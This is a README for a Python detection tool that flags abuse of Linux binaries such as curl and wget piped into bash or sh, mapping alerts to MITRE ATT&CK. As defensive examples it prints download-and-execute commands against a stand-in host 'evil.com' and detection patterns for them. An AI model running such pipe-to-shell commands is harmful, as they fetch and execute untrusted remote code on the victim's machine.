🛡️ LOLBins Detection Tool (Linux)

A behavior-based detection tool that identifies malicious abuse of Living-Off-The-Land Binaries (LOLBins) such as curl, wget, bash, and sh on Linux systems.

This project focuses on real attacker behavior, not signatures, combining:

  • Process monitoring
  • Shell history analysis
  • Temporal process correlation
  • MITRE ATT&CK mapping
  • False-positive reduction

🧠 What are LOLBins?

Living-Off-The-Land Binaries (LOLBins) are legitimate system tools that attackers abuse to:

  • Download payloads
  • Execute remote code
  • Evade detection

Examples:

curl | bash
wget -O- | sh

🚀 Features

✅ Process Monitoring

  • Monitors running processes using psutil

  • Logs executions of common LOLBins

✅ Shell History Analysis

  • Reads new .bash_history entries only

  • Detects dangerous patterns like:

curl http://evil.com/payload.sh | bash

✅ Temporal Process Correlation

  • Detects suspicious chains like:

curl → bash (within 2 seconds)

  • Requires execution intent (pipe, -O-, payload indicators)

✅ False-Positive Reduction

  • Trusted domains are suppressed

  • Benign interactive shells do not trigger alerts

✅ MITRE ATT&CK Mapping

Alerts are mapped to:

  • T1105 – Ingress Tool Transfer

  • T1059 – Command and Scripting Interpreter

  • T1059.004 – Unix Shell

✅ Explainable Alerts

Each alert includes:

  • Exact command

  • Downloader → shell relationship

  • MITRE techniques

⚙️ Requirements

  • Python 3.8+

  • Linux OS

  • Dependency:

pip install -r requirements.txt

Test Scenario

Benign Command

curl https://example.com

✔ Logged as INFO ❌ No alert

Malicious Execution

curl http://evil.com/payload.sh | bash

🚨 Alert:

[HIGH] process-chain | downloader followed by shell | bash | MITRE=T1105,T1059

Advanced Abuse:

wget http://evil.com/payload.sh -O- | sh

🚨 HIGH severity alert

📄 Log Files

process.log

Raw process telemetry:

PID | binary | command

info.log

Benign LOLBin usage:

[INFO] curl | {...}

alerts.log

Confirmed malicious behavior:

[HIGH] process-chain | curl ... -> bash | MITRE=T1105,T1059

🧠 Detection Logic Summary

Behavior            Alert
curl only           No alert (logged as INFO)
interactive bash    No alert
trusted domains     Suppressed
curl | bash         HIGH
wget -O- | sh       HIGH
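The correlation and suppression rules summarised above, worked through in an added Python example (not the project's own code). The trusted-domain allow-list, the execution-intent indicators and the sample telemetry are constructed assumptions; the output lines follow the info.log and alerts.log formats shown in this README.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Added illustration, not the project's code; allow-list, window and indicators are assumptions.
DOWNLOADERS, SHELLS = {"curl", "wget"}, {"bash", "sh"}
TRUSTED_DOMAINS = {"example.com"}   # assumed allow-list for false-positive suppression
CHAIN_WINDOW = 2.0                  # downloader -> shell window in seconds (README: 2 s)
MITRE = {"curl": "T1105", "wget": "T1105", "bash": "T1059", "sh": "T1059"}
# "execution intent": pipe into a shell, write to stdout (-O-), or a script-looking URL
INTENT = re.compile(r"\|\s*(?:bash|sh)\b|-O-|https?://\S+\.sh\b")

@dataclass
class Event:            # one process-monitor (or shell-history) observation
    pid: int
    binary: str         # basename of the executable
    cmdline: str        # command as captured
    ts: float           # epoch seconds

def all_trusted(cmdline: str) -> bool:
    # True only when every URL in the command points at an allow-listed host
    hosts = [urlparse(u).hostname for u in re.findall(r"https?://\S+", cmdline)]
    return bool(hosts) and all(h in TRUSTED_DOMAINS for h in hosts)

def correlate(events):
    """Return (info_lines, alert_lines) in the formats shown in info.log / alerts.log."""
    events = sorted(events, key=lambda e: e.ts)
    infos, alerts, chained = [], [], set()
    for i, ev in enumerate(events):
        if ev.pid in chained or ev.binary not in DOWNLOADERS | SHELLS:
            continue
        suspicious = (ev.binary in DOWNLOADERS and not all_trusted(ev.cmdline)
                      and INTENT.search(ev.cmdline) is not None)
        # a chain is a suspicious downloader followed by a shell inside the window
        shell = next((n for n in events[i + 1:] if n.binary in SHELLS
                      and n.ts - ev.ts <= CHAIN_WINDOW), None) if suspicious else None
        if shell is None:
            infos.append(f"[INFO] {ev.binary} | {ev.cmdline}")   # benign LOLBin use
            continue
        chained.add(shell.pid)
        alerts.append(f"[HIGH] process-chain | downloader followed by shell | "
                      f"{shell.binary} | MITRE={MITRE[ev.binary]},{MITRE[shell.binary]}")
    return infos, alerts

# constructed telemetry covering the README's benign, malicious and out-of-window cases
SAMPLE = [Event(101, "curl", "curl https://example.com", 10.0),
          Event(102, "bash", "bash", 20.0),                          # interactive shell
          Event(103, "curl", "curl http://evil.com/payload.sh", 30.0),
          Event(104, "bash", "bash", 30.5),                          # chained within 2 s
          Event(105, "wget", "wget http://evil.com/payload.sh -O-", 40.0),
          Event(106, "sh", "sh", 41.0),
          Event(107, "curl", "curl http://evil.com/payload.sh", 50.0),
          Event(108, "bash", "bash", 55.0)]                          # 5 s later: no chain
```

Running `correlate(SAMPLE)` yields two HIGH alerts (the curl → bash and wget -O- → sh chains) and four INFO lines, including the out-of-window curl and the interactive shells.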

🧩 MITRE ATT&CK Techniques

Technique Description
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
T1059.004 Unix Shell

About

Built a Python-based LOLBins detection tool to identify malicious abuse of legitimate Linux binaries using behavior-based analysis. The tool correlates process activity and shell history, detects suspicious execution chains, and maps alerts to MITRE ATT&CK techniques to support threat hunting and SOC workflows.
